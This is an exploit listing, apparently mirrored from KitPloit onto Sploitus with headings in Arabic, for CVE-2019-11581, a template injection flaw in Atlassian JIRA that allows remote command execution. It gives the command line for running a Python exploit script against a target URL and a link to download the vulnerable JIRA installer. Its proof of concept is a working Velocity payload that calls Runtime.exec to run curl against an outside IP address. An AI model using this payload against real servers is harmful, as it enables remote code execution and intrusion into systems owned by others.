Sploitus

Exploit for CVE-2019-11581

kitploit · 2026-08-28

Exploit Code

MARKDOWN21 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAS502N-CVE-2019-11581
# CVE-2019-11581

## ثغرة حقن القوالب في Atlassian JIRA وتنفيذ الأوامر عن بُعد (RCE)

## عرض توضيحي

`python CVE-2019-11581.py http://xx.xx.xx.xx:8080/ "Command"`

![](https://assets.kitploit.com/production/public/readmes/27335/4c505152b7bc768d4c7ce1dfdcec54d4773a7d54da68480b2d8c0fa6c223bcaa.jpg)

### تحميل الإصدار المعرّض للثغرة

`https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe` ![](https://assets.kitploit.com/production/public/readmes/27335/a9c46e8c1a86c511e15f0ea7ea7d3fcca33bcdd761746c937f64d7ac7ca8b8d7.jpg)

### إثبات المفهوم (PoC)

root@kitploit:~
    
    
    $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl 47.97.112.98:8000//jas502n//').waitFor()